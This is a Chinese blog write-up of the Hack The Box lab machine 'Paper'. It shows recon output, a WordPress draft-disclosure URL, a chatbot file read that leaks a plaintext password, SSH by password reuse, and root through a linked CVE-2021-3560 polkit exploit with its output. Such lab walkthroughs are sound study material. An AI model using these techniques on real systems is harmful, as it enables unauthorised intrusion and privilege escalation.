Paper

HTB

 2025/09/17 

哈哈哈哈给做这个靶机的人好有意思打的时候笑出了声

Recon

❯ nmap 10.10.11.143
Starting Nmap 7.98 ( https://nmap.org ) at 2025-09-17 12:21 +0800
Nmap scan report for 10.10.11.143 (10.10.11.143)
Host is up (0.44s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

最开始的时候扫描发现稍微有点奇怪一个http一个https 但是没有很在意直接访问发现是一个测试页

尝试进一步分析当我用-sCV的时候发现有点奇怪

❯ nmap -sCV 10.10.11.143
Starting Nmap 7.98 ( https://nmap.org ) at 2025-09-17 12:28 +0800
Nmap scan report for 10.10.11.143 (10.10.11.143)
Host is up (0.30s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT     STATE    SERVICE   VERSION
22/tcp   open     ssh       OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
|   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
|   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp   open     http      Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: HTTP Server Test Page powered by CentOS
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods:
|_  Potentially risky methods: TRACE
443/tcp  open     ssl/http  Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-title: HTTP Server Test Page powered by CentOS
| http-methods:
|_  Potentially risky methods: TRACE
| tls-alpn:
|_  http/1.1
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after:  2022-07-08T10:32:34
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
5225/tcp filtered hp-server
9290/tcp filtered unknown

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 126.43 seconds

能看到显示的443端口分配给的是测试页 说明可能存在重定向抓包后在返回头中看到了后端服务器域名

HTTP/1.1 403 Forbidden
Date: Wed, 17 Sep 2025 04:34:17 GMT
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
X-Backend-Server: office.paper
Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT
ETag: "30c0b-5c5c7fdeec240"
Accept-Ranges: bytes
Content-Length: 199691
Connection: close
Content-Type: text/html; charset=UTF-8

当然使用CMS扫描能发现是个wordpress的博客框架

❯ python3 CmsVulScan.py -u http://office.paper

  _____            __      __    _  _____
 / ____|           \ \    / /   | |/ ____|
| |     _ __ ___  __\ \  / /   _| | (___   ___ __ _ _ __
| |    | '_ ` _ \/ __\ \/ / | | | |\___ \ / __/ _` | '_ \
| |____| | | | | \__ \\  /| |_| | |____) | (_| (_| | | | |
 \_____|_| |_| |_|___/ \/  \__,_|_|_____/ \___\__,_|_| |_|


[12:39:38] [*] Check whether the payload file exists
[12:39:38] [*] All Payload 18780 duplicate removal 6935
[12:39:38] [+] Payload load the success
[12:39:38] [*] CMS recognition of http://office.paper in progress
[12:39:38] [*] Scanning by MD5 mode......
[12:39:41] [*] MD5: 85/3725
[12:39:41] [+] Using MD5 to discover the CMS in path /wp-admin/images/wordpress-logo.png: wordpress
[12:40:38] [*] MD5: 1784/3725
[12:40:38] [+] Using MD5 to discover the CMS in path /wp-includes/js/jcrop/Jcrop.gif: WORDPRESS

Shell as dwight

CVE-2019-17671

再进一步观察发现版本是5.2.3的版本还算可以

1
2
3

msf auxiliary(scanner/http/wordpress_scanner) > run
[*] Trying 10.10.11.143
[+] 10.10.11.143 - Detected Wordpress 5.2.3

通过WPScan和多方搜集找到了CVE-2019-17061 但是为什么实际利用起来会是这样的payload确实想不明白这块还是不太理解特别只用了一部分的payload

1	http://office.paper/?static=1

进来之后拿到用户注册地址并注册一个账号成功进入下一步

Shell as dwight

发现这个机器人可以执行cd和cat操作试一下拿flag

发现他在装傻故意不给我() 看了下目录发现这个机器人应该就是在dwight用户下跑的后边没思路了去看了下HTB给的提示找到机器人对应的配置文件

<!=====Contents of file ../../../home/dwight/hubot/.env=====>
export ROCKETCHAT_URL='http://127.0.0.1:48320'
export ROCKETCHAT_USER=recyclops
export ROCKETCHAT_PASSWORD=Queenofblad3s!23
export ROCKETCHAT_USESSL=false
export RESPOND_TO_DM=true
export RESPOND_TO_EDITED=true
export PORT=8000
export BIND_ADDRESS=127.0.0.1
<!=====End of file ../../../home/dwight/hubot/.env=====>

确实都是同一个用户的话密码复用的概率极高即使真实情况也如此

❯ ssh dwight@10.10.11.143
The authenticity of host '10.10.11.143 (10.10.11.143)' can't be established.
ED25519 key fingerprint is SHA256:9utZz963ewD/13oc9IYzRXf6sUEX4xOe/iUaMPTFInQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.143' (ED25519) to the list of known hosts.
dwight@10.10.11.143's password:
Activate the web console with: systemctl enable --now cockpit.socket

Last login: Tue Feb  1 09:14:33 2022 from 10.10.14.23
[dwight@paper ~]$

至此成功连上SSH 拿到flag

Shell as root

❯ ssh dwight@10.10.11.143
dwight@10.10.11.143's password:
Activate the web console with: systemctl enable --now cockpit.socket

Last login: Wed Sep 17 06:39:13 2025 from 10.10.16.2
[dwight@paper ~]$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for dwight:
Sorry, user dwight may not run sudo on paper.

直接sudo -l发现并没有找到什么有意思的换种方式试一下最开始还是先试一下SUID

[dwight@paper ~]$ find / -perm -u=s -type f 2>/dev/null
...
/usr/lib/polkit-1/polkit-agent-helper-1
...

发现了有polkit 这个东西好像有洞那就传个linpeas上去看看

                                        ╔════════════════════╗
════════════════════════════════════════╣ System Information ╠════════════════════════════════════════
                                        ╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 4.18.0-348.7.1.el8_5.x86_64 (mockbuild@kbuilder.bsys.centos.org) (gcc version 8.5.0 20210514 (Red Hat 8.5.0-4) (GCC)) #1 SMP Wed Dec 22 13:25:12 UTC 2021
lsb_release Not Found

╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version   
Sudo version 1.8.29

╔══════════╣ CVEs Check
Vulnerable to CVE-2021-3560

CVE-2021-3560对应的正好就是polkit的洞找到脚本跑一手脚本有概率成功多试几次

https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation

[dwight@paper ~]$ bash ./poc.sh

[!] Username set as : secnigma
[!] No Custom Timing specified.
[!] Timing will be detected Automatically
[!] Force flag not set.
[!] Vulnerability checking is ENABLED!
[!] Starting Vulnerability Checks...
[!] Checking distribution...
[!] Detected Linux distribution as "centos"
[!] Checking if Accountsservice and Gnome-Control-Center is installed
[+] Accounts service and Gnome-Control-Center Installation Found!!
[!] Checking if polkit version is vulnerable
[+] Polkit version appears to be vulnerable!!
[!] Starting exploit...
[!] Inserting Username secnigma...
Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required
[+] Inserted Username secnigma  with UID 1005!
[!] Inserting password hash...
[!] It looks like the password insertion was succesful!
[!] Try to login as the injected user using su - secnigma
[!] When prompted for password, enter your password
[!] If the username is inserted, but the login fails; try running the exploit again.
[!] If the login was succesful,simply enter 'sudo bash' and drop into a root shell!
[dwight@paper ~]$ su - secnigma
Password:
[secnigma@paper ~]$ sudo bash
[sudo] password for secnigma:
[root@paper secnigma]# cat /root/root.txt
1cffe7d878909bf7f9dd79032d883e68

Author：Xu Haoxiang

Link：http://dawoxiansigema.github.io/2025/09/17/Paper/

Publish date：September 17th 2025, 12:37:12 pm

Update date：September 18th 2025, 10:46:08 am

License：本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

Previous Post

Devvortex

CATALOG

1. Recon
2. Shell as dwight
1. 2.1. CVE-2019-17671
3. Shell as dwight
4. Shell as root